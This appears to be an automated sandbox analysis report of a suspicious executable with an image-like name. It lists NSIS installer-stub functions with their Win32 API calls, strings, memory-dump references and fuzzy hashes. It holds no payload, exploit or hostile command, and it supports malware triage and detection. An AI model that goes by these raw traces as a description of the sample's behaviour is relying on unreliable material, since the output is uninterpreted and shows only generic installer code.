                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                        • ShowWindow.USER32(?,00000008), ref: 0040565D
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                        • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                        • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                        • CloseHandle.KERNEL32(00000000), ref: 004056E4
                                        • ShowWindow.USER32(00000000), ref: 00405707
                                        • ShowWindow.USER32(?,00000008), ref: 0040570E
                                        • ShowWindow.USER32(00000008), ref: 00405754
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                        • CreatePopupMenu.USER32 ref: 00405799
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                        • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                        • OpenClipboard.USER32(00000000), ref: 00405833
                                        • EmptyClipboard.USER32 ref: 00405839
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                        • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                        • CloseClipboard.USER32 ref: 0040588A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID:
                                        • API String ID: 590372296-0
                                        • Opcode ID: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                        • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                        • Opcode Fuzzy Hash: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                        • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                        Function 00403E33 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                        • ShowWindow.USER32(?), ref: 00403E8F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                        • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                        • DestroyWindow.USER32 ref: 00403ECE
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                        • GetDlgItem.USER32(?,?), ref: 00403F06
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                        • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                        • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                        • ShowWindow.USER32(00000000,?), ref: 00404108
                                        • EnableWindow.USER32(?,?), ref: 0040411A
                                        • EnableWindow.USER32(?,?), ref: 00404135
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                        • EnableMenuItem.USER32(00000000), ref: 00404152
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                        • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                        • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                        • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                        • String ID:
                                        • API String ID: 1860320154-0
                                        • Opcode ID: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                        • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                        • Opcode Fuzzy Hash: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                        • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                                        Function 00403A96 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                          • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                        • lstrcatA.KERNEL32(00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410,00436400,?,00435000,0000000A,0000000C), ref: 00403B11
                                        • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,00435400,00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410), ref: 00403B86
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                        • GetFileAttributesA.KERNEL32(0042DFC0,?,00435000,0000000A,0000000C), ref: 00403BA4
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403BED
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                        • ShowWindow.USER32(00000005,00000000,?,00435000,0000000A,0000000C), ref: 00403CAD
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                        • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 1975747703-2904746566
                                        • Opcode ID: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                        • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                        • Opcode Fuzzy Hash: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                        • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                        Function 00404498 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                        • GetSysColor.USER32(?), ref: 00404566
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                        • lstrlenA.KERNEL32(?), ref: 00404587
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                        • SendMessageA.USER32(00000000), ref: 00404610
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                        • SetCursor.USER32(00000000), ref: 00404693
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                        • SetCursor.USER32(00000000), ref: 004046AC
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: N$cD@
                                        • API String ID: 3103080414-2800326580
                                        • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                        • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                        • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                        Function 00405EF6 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                        • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                        • wsprintfA.USER32 ref: 00405F6B
                                        • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                        • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                        • GlobalFree.KERNEL32(00000000), ref: 00406054
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                        • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                        • Opcode Fuzzy Hash: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                        • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                        Function 004047BF Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                        • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                        • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                        • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                        • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                        • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                          • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                          • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,74DF3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                          • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                          • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                          • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A
                                        • API String ID: 2624150263-3554254475
                                        • Opcode ID: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                        • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                        • Opcode Fuzzy Hash: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                        • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                        Function 00402F31 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 181memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F42
                                        • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                        • GlobalAlloc.KERNEL32(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                        Strings
                                        • Error launching installer, xrefs: 00402F81
                                        • Inst, xrefs: 00403016
                                        • 8TA, xrefs: 00402FBF
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                        • Null, xrefs: 00403028
                                        • soft, xrefs: 0040301F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: 8TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-1977864323
                                        • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                        • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                        Function 00406320 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 208stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
                                        • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,00429C68,00000000,00405409,00429C68,00000000,00000000), ref: 00406468
                                        • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064C7
                                        • CoTaskMemFree.OLE32(00000000,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064D0
                                        • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064F4
                                        • lstrlenA.KERNEL32(0042DFC0,?,00429C68,00000000,00405409,00429C68,00000000,00000000,?,74DF23A0), ref: 00406546
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
                                        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-730719616
                                        • Opcode ID: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                        • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                        • Opcode Fuzzy Hash: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                        • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                        Function 00404394 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                        • GetSysColor.USER32(00000000), ref: 004043EF
                                        • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                        • SetBkMode.GDI32(?,?), ref: 00404407
                                        • GetSysColor.USER32(?), ref: 0040441A
                                        • SetBkColor.GDI32(?,?), ref: 0040442A
                                        • DeleteObject.GDI32(?), ref: 00404444
                                        • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2886748855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000004.00000002.2886722224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886766178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886784608.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000004.00000002.2886807482.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                        • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                        Function 004053D1 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
